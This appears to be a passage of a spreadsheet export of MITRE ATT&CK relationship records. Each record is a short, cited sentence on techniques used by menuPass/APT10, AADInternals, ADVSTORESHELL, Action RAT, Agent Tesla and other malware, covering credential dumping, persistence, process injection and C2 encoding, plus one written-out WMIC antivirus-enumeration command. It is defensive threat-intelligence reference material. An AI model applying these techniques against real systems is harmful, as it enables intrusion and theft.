    <t xml:space="preserve">[menuPass](https://attack.mitre.org/groups/G0045) has used [esentutl](https://attack.mitre.org/software/S0404) to change file extensions to their true type that were masquerading as .txt files.(Citation: FireEye APT10 Sept 2018) </t>
  </si>
  <si>
    <t>relationship--06b18704-e29e-4bf9-900f-44aa719df0c6</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has been seen changing malicious files to appear legitimate.(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>relationship--d464c661-d4da-427f-8c16-dfc275735fe9</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used Ntdsutil to dump credentials.(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--5ffaf9bf-10a0-477f-88ff-5b9e7d5831cc</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used native APIs including &lt;code&gt;GetModuleFileName&lt;/code&gt;, &lt;code&gt;lstrcat&lt;/code&gt;, &lt;code&gt;CreateFile&lt;/code&gt;, and &lt;code&gt;ReadFile&lt;/code&gt;.(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--7b59aa8f-d9d6-4bb5-b2ca-6fc1d36c1550</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used tcping.exe, similar to [Ping](https://attack.mitre.org/software/S0097), to probe port status on systems of interest.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--0d889b2d-eda4-45dc-99bf-c530b7d4b05f</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--998650da-f301-46be-ab18-38d14359530b</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) uses [PowerSploit](https://attack.mitre.org/software/S0194) to inject shellcode into PowerShell.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--e104cf3c-a802-4e06-8abc-6293cea9492f</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used process hollowing in iexplore.exe to load the [RedLeaves](https://attack.mitre.org/software/S0153) implant.(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>relationship--ad7592fd-f5d3-4802-9217-dffe89a6c8eb</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has staged data on remote MSP systems or other victim networks prior to exfiltration.(Citation: PWC Cloud Hopper April 2017)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--9ffd6752-5d0f-4108-8cab-8541b54c0434</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used RDP connections to move across the victim network.(Citation: PWC Cloud Hopper April 2017)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>relationship--bd78bfa6-f30e-4429-ac06-0039d553a69d</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</si>
  <si>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</si>
  <si>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relationship--03f32a8b-4cd9-488c-9759-37f3dff9faea</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has renamed [certutil](https://attack.mitre.org/software/S0160) and moved it to a different location on the system to avoid detection based on use of the tool.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--5151bd6c-fb42-49da-9c97-f32a33a505a1</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used Putty Secure Copy Client (PSCP) to transfer data.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>relationship--f16c18f0-c5ac-4ea2-bfd0-222e63c09018</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--a901eaf4-7cbe-43c2-9c03-7d716357edc9</t>
  </si>
  <si>
    <t>relationship--9066dcee-7c80-429c-a5cc-77458e891349</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</si>
  <si>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</si>
  <si>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relationship--239d98a7-f134-4270-8333-c2df2feaa9ca</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--4cc8afb8-86ab-4537-926f-3178975a7886</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used &lt;code&gt;net use&lt;/code&gt; to conduct connectivity checks to machines.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>relationship--12ea66f1-566a-404f-a948-f76b9047710e</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used and modified open-source tools like [Impacket](https://attack.mitre.org/software/S0357), [Mimikatz](https://attack.mitre.org/software/S0002), and [pwdump](https://attack.mitre.org/software/S0006).(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--34ff9bfb-0b3a-4b83-af85-60700ed052f4</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</si>
  <si>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</si>
  <si>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relationship--99a96ac0-c93d-488b-8439-04d97716682c</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</si>
  <si>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</si>
  <si>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relationship--44273d72-b0d9-42ee-9e8e-53d1b39f0651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</si>
  <si>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</si>
  <si>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relationship--dea36846-b8ad-4926-a242-9fa2d12069c8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</si>
  <si>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</si>
  <si>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relationship--04203d88-5fe1-4e63-be65-51a17705716b</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to retrieve metadata for files on disk as well as a command to list the current working directory.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--7c0995ef-ab5d-48f9-8884-7d953c4c3247</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</si>
  <si>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</si>
  <si>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relationship--0e630f6b-8662-4ffe-b666-709e17aad69f</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to set certain attributes such as creation/modification timestamps on files.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--d43315b0-d708-4197-b3ed-0a0b1199e434</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--2d659138-90e5-4b67-8956-02120d99506f</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain file and directory listings.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--26968975-5f01-4b4b-9cdc-ef3b76710304</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain a listing of running processes (including loaded modules).(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--71ee5336-929a-41c7-bfbd-42a7208ca29d</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) obfuscates C2 communication using a 1-byte XOR with the key 0xBE.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--6613ed52-5c6c-43f2-bd0c-9809769cb022</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) sends an OS version identifier in its beacons.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--27375058-3002-4fc2-a964-a1e336a10a2a</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--453914ae-8d76-4796-b507-dafc33adf005</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to create a remote shell.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--43a63e7a-d673-47c0-9af5-76dcd5a5d9b8</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can enumerate Azure AD users.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--ce26fb61-137e-489c-8c69-d2ac5a9f59ce</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can create new Azure AD users.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--7a5c8052-723b-47e1-943f-0731b9177730</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can execute commands on Azure virtual machines using the VM agent.(Citation: AADInternals Root Access to Azure VMs)</t>
  </si>
  <si>
    <t>relationship--deb5cfb8-d9e8-46bf-9f13-3f3dfca885d9</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can enumerate Azure AD groups.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--73b54501-4907-45ec-b64a-4465a2f07a96</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--16c64146-61e6-4be5-bdc3-1fa97870a080</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--5cd4af07-d10e-4034-84fc-b8256f08b5cd</t>
  </si>
  <si>
    <t>AADInternals can collect files from a user’s OneDrive.(Citation: AADInternals)</t>
  </si>
  <si>
    <t>relationship--e8747d32-65e4-4a55-a5c8-e87136cc44da</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can register a device to Azure AD.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--5124a13e-f7a3-43ad-88e4-c73c380cb6f7</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can gather information about a tenant’s domains using public Microsoft APIs.(Citation: AADInternals Documentation)(Citation: Azure AD Recon)</t>
  </si>
  <si>
    <t>relationship--a3932823-51c8-402d-a7a7-ee31882fc48a</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</si>
  <si>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</si>
  <si>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relationship--6ea91f17-6015-4339-9b86-2bf51977a7aa</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can check for the existence of user email addresses using public Microsoft APIs.(Citation: AADInternals Documentation)(Citation: Azure AD Recon)</t>
  </si>
  <si>
    <t>relationship--a43dfdcf-380a-43ae-877f-891a01ed1c53</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can directly download cloud user data such as OneDrive files.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--fc2c7ee8-31f1-49f6-afd5-69443db69ab7</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can inject a malicious DLL (`PTASpy`) into the `AzureADConnectAuthenticationAgentService` to backdoor Azure AD Pass-Through Authentication.(Citation: AADInternals Azure AD On-Prem to Cloud)</t>
  </si>
  <si>
    <t>relationship--3691a1cd-c9d4-4492-b6c1-7ceb1b661758</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can dump secrets from the Local Security Authority.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--d101870c-304e-4597-a292-7d5e8c870f95</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can modify registry keys as part of setting a new pass-through authentication agent.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--faa657c6-e223-4b45-8f92-b35fbd76bd56</t>
  </si>
  <si>
    <t>The [AADInternals](https://attack.mitre.org/software/S0677) `Set-AADIntUserMFA` command can be used to disable MFA for a specified user.</t>
  </si>
  <si>
    <t>relationship--d5e008e5-28ff-4f0a-8e09-ab637c733646</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) is written and executed via PowerShell.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--ee9a7f72-eac2-4ca4-b82a-5c5a50618d0d</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can gather encryption keys from Azure AD services such as ADSync and Active Directory Federated Services servers.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--bdf68d86-fce4-46ad-9421-afdaf14273fe</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can be used to create SAML tokens using the AD Federated Services token signing certificate.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--a371d1a1-29aa-4d11-bad4-d11866171c6c</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--ae78b837-1698-44a4-a81a-8eece005ea9f</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can send "consent phishing" emails containing malicious links designed to steal users’ access tokens.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--731a7678-8b88-47c9-88a6-7bc897bb79bb</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can send phishing emails containing malicious links designed to collect users’ credentials.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--545efdec-5375-43e9-b369-0f6367b067dd</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can steal users’ access tokens via phishing emails containing malicious links.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--c620753b-17ad-43bd-ace3-f572ebcac644</t>
  </si>
  <si>
    <t>[AADInternals](https://attack.mitre.org/software/S0677) can create and export various authentication certificates, including those associated with Azure AD joined/registered devices.(Citation: AADInternals Documentation)</t>
  </si>
  <si>
    <t>relationship--234867ce-57bb-41c6-beb5-af9cc00e1a39</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--3c8467e6-0878-4c62-afe6-55f124872089</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to download files from C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--9ffa4f56-8fe5-4439-897d-df432bccb52d</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--97fe312d-7a04-43f9-8076-69fe324517ce</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to identify the installed anti-virus product on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--07173c7c-335d-488b-b3ff-2f94168500db</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--aba32ee8-9eca-45fa-99f3-89e75dbc16a6</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--51151669-a076-4d4a-af68-cf303baf01d5</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--eda69379-85f5-4512-aadc-ed7f5d2883bf</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--2a8f0313-4059-42b9-b487-6c8f860588c0</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--c0e78590-0266-43e0-8fb5-efd95556c20c</t>
  </si>
  <si>
    <t>A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with RSA.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--d5bc22fc-16dd-4ab6-9599-828f4b33ec2b</t>
  </si>
  <si>
    <t>Some variants of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--075e7d33-8d5c-4016-9a24-dc6e61f56fcd</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) exfiltrates data over the same channel used for C2.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--d8abe157-f6cd-4959-b9d5-e0c87d16bcfe</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can delete files and directories.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--53cc6b0b-66ec-4f7d-a725-f65b076b5428</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list files and directories.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--7105ecea-8da8-4723-b717-ae9c3152cfdd</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can perform keylogging.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--0d328be7-85d2-4558-a4e3-cc5ce8bc7e2e</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) stores output from command execution in a .dat file in the %TEMP% directory.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--5d397a8d-2195-440d-a0f5-bbf6c3e8f6e4</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of setting and deleting Registry values.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--a71256aa-a2e3-447c-ba4e-004ba4f062b2</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of starting a process using CreateProcess.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--cc2099fb-4785-4884-b274-4f3e8a3b8d99</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</si>
  <si>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</si>
  <si>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relationship--b6fc7740-4e5f-4f4c-8b1e-d0e3368eee03</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list connected devices.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--a0f1273a-e422-4801-a911-e7cb223ebea2</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list running processes.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--66819f02-7a22-4f21-8e4f-df24969e5567</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can enumerate registry keys.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--9f496c45-eac5-464f-858b-ef481f2f37ff</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieves persistence by adding itself to the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--284ffb1b-ad42-468e-9897-94c25024f0d4</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) has used rundll32.exe in a Registry value to establish persistence.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--12904c83-67ad-430f-96ae-20e9081c2b5d</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--5eb253cb-2e81-4f51-bd0e-d1734283491c</t>
  </si>
  <si>
    <t>C2 traffic from [ADVSTORESHELL](https://attack.mitre.org/software/S0045) is encrypted, then encoded with Base64 encoding.(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>relationship--103f1ad4-feec-4be3-9da7-ee0b2503c318</t>
  </si>
  <si>
    <t>A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with 3DES.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--85a92b0f-f8c3-41a9-a1b3-cfbf8b442b39</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can run [Systeminfo](https://attack.mitre.org/software/S0096) to gather information about the victim.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--090a553a-b863-4214-aa3b-cf8ea7ba2d68</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>relationship--9a05a8cc-8d3c-46a5-947e-bebed2ab1c5a</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can create a remote shell and run a given command.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>relationship--6f448f20-0349-4132-80ec-d46e94d52426</t>
  </si>
  <si>
    <t>[ANDROMEDA](https://attack.mitre.org/software/S1074) can download additional payloads from C2.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--0b15b2f4-ba30-4393-88ec-08235206bfac</t>
  </si>
  <si>
    <t>[ANDROMEDA](https://attack.mitre.org/software/S1074) has been delivered through a LNK file disguised as a folder.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--84b29e13-6577-4db2-846c-a42caf068cb8</t>
  </si>
  <si>
    <t>18 May 2023</t>
  </si>
  <si>
    <t>[ANDROMEDA](https://attack.mitre.org/software/S1074) has been installed to `C:\Temp\TrustedInstaller.exe` to mimic a legitimate Windows installer service.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--49cf55fb-437d-439d-aeb7-466de585a0ed</t>
  </si>
  <si>
    <t>[ANDROMEDA](https://attack.mitre.org/software/S1074) can inject into the `wuauclt.exe` process to perform C2 actions.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--3bffbeb5-27d2-4fc3-b28b-b9f686572009</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</si>
  <si>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</si>
  <si>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relationship--91e4cb6a-abe6-46e0-8730-b80ba1cca16f</t>
  </si>
  <si>
    <t>[ANDROMEDA](https://attack.mitre.org/software/S1074) has been spread via infected USB keys.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--ce1bc121-5337-4be7-b363-f94a22ca10dc</t>
  </si>
  <si>
    <t>[ANDROMEDA](https://attack.mitre.org/software/S1074) has the ability to make GET requests to download files from C2.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--4396e1a5-aa78-41f7-802c-9ca9d2173f3a</t>
  </si>
  <si>
    <t>[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. The ASPXTool version used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) has been deployed to accessible servers running Internet Information Services (IIS).(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--660d09ce-8722-42b3-8503-911dff37bf22</t>
  </si>
  <si>
    <t>09 January 2020</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can collect local data from an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--fa0bc7fd-2e00-435b-8cb3-0ade491d1259</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can use Base64 to decode actor-controlled C2 server communications.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--0303acd0-64a4-4e40-b8e3-29e1c43694d2</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect drive and file information on an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--ce85101e-baca-4a1a-9352-9c9db89706a4</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) has the ability to download additional payloads onto an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--0e7cace2-18db-4068-8a99-3dc66ed24741</t>
  </si>
  <si>
    <t xml:space="preserve"> [Action RAT](https://attack.mitre.org/software/S1028)'s commands, strings, and domains can be Base64 encoded within the payload.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--7d8a48be-2429-401f-b963-ec0f5927a282</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can identify AV products on an infected host using the following command: `cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--e85d72e6-f217-4f8e-bdb9-5143a06e52a8</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the hostname, OS version, and OS architecture of an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--c707d09b-1b36-4a1c-99be-c905fdd3ff6b</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the MAC address of an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--5fa04706-b980-4f03-a8c6-96933b7c3203</t>
  </si>
  <si>
    <t xml:space="preserve"> [Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the username from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--e4960a7a-c280-4356-8b03-b848c68acd05</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can use HTTP to communicate with C2 servers.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--33e9f279-3947-4551-97f3-b6e93de88e39</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can use `cmd.exe` to execute commands on an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--feb5dda0-1300-4e5b-9372-7d6b4d5473f3</t>
  </si>
  <si>
    <t>[Action RAT](https://attack.mitre.org/software/S1028) can use WMI to gather AV products installed on an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--2440db47-5c7d-4f60-89e8-d5a6f19f0d0d</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</si>
  <si>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</si>
  <si>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relationship--fb21ff9d-1cd5-4908-a3a4-5f0d22cb8c10</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain groups.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>relationship--4358ef19-eef7-48bb-9941-39d70bf235af</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</si>
  <si>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</si>
  <si>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relationship--31025044-b0de-4dcd-bd26-fe467b803000</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</si>
  <si>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</si>
  <si>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relationship--dfe9acb4-48fe-4241-8b17-d76534f75b62</t>
  </si>
  <si>
    <t>29 August 2022</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can extract subnet information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>relationship--54f36f78-5046-48f5-9ec8-0348ae057fff</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can encrypt data with 3DES before sending it over to a C2 server.(Citation: Talos Agent Tesla Oct 2018)</t>
  </si>
  <si>
    <t>relationship--c48ff628-9276-492f-a61c-73989785b292</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to use form-grabbing to extract data from web data forms.(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>relationship--5bbbd951-0c4a-4293-b0a8-27751b953882</t>
  </si>
  <si>
